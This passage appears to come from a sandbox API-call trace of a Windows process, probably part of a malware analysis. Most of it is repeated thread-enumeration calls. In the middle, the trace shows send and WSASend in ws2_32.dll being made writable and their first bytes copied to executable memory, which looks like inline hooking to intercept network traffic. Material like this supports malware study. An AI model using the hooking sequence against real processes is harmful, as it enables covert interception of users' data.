(hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.234] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.235] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.235] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.235] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.235] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.236] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.236] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.236] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.237] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.237] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.237] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.238] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.238] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.238] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.238] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.239] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.239] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.378] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.379] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.379] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.379] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.379] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.380] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.380] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.380] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.381] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.381] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.381] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.381] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.382] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.382] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.396] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.396] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.396] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.397] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.397] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.397] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.398] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.398] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.399] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.399] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.399] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.399] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.400] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.400] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.400] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.401] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.401] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.401] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.402] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.402] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.402] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.402] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.403] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.403] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.403] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.404] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.404] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.404] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.405] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.405] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.405] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.405] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.406] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.406] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.406] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.407] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.407] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.407] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.408] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.408] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.408] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.408] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.409] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.409] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.409] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.410] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.410] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.410] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.411] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.411] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.411] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.412] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.515] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.516] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.516] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.516] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.516] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.517] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.517] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.517] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.526] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.526] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0166.719] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0166.719] GetProcAddress (hModule=0x7fefe260000, lpProcName="send") returned 0x7fefe268000 [0166.721] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x1fa5224 | out: lpflOldProtect=0x1fa5224*=0x20) returned 1 [0166.721] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x2030000 [0166.721] RtlMoveMemory (in: Destination=0x2030000, Source=0x7fefe268000, Length=0xf | out: Destination=0x2030000) [0166.721] VirtualProtect (in: lpAddress=0x7fefe268000, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x1fa5224 | out: lpflOldProtect=0x1fa5224*=0x40) returned 1 [0167.372] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x7fefe260000 [0167.372] GetProcAddress (hModule=0x7fefe260000, lpProcName="WSASend") returned 0x7fefe2613b0 [0167.372] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x40, lpflOldProtect=0x1fa5224 | out: lpflOldProtect=0x1fa5224*=0x20) returned 1 [0167.372] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x2050000 [0167.372] RtlMoveMemory (in: Destination=0x2050000, Source=0x7fefe2613b0, Length=0xf | out: Destination=0x2050000) [0167.373] VirtualProtect (in: lpAddress=0x7fefe2613b0, dwSize=0xf, flNewProtect=0x20, lpflOldProtect=0x1fa5224 | out: lpflOldProtect=0x1fa5224*=0x40) returned 1 [0167.379] GetCurrentProcessId () returned 0x448 [0167.379] GetCurrentThreadId () returned 0xa0c [0167.379] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0xdc [0167.381] Thread32First (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.381] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.382] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.382] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.382] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.383] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.384] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.385] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.386] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.387] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.388] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.389] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.390] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.391] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.392] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.393] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.394] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.395] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.396] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.518] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.519] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.520] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.521] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.522] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.523] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.524] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.525] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.526] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.526] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.526] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.527] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.527] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.527] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.528] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.528] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.528] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.528] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.529] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.529] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.529] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.530] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.530] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.530] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.530] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.531] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.531] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.531] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.532] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.532] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.532] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.533] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.533] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.533] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.533] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.534] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.534] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.534] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.535] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.535] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.535] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.536] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.536] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.536] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.537] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.537] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.538] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.538] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.538] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.539] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.539] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.539] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.539] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.540] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.540] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.540] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.541] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.541] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.541] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.541] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.542] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.542] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.542] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.543] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.543] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.543] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.544] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.544] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.544] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.544] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.545] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.545] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.545] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.546] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.546] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.546] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.546] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.547] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.547] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.547] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.548] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.548] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.548] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.549] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.549] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.549] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.549] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.550] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.550] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.656] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.657] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.657] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.657] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.658] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.658] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.658] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.658] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.659] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.659] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.659] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.660] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.660] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.660] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.661] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.661] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.661] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.661] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.662] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.662] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.663] Thread32Next (hSnapshot=0xdc, lpte=0x284fb90) returned 1 [0167.663] Thread32Next 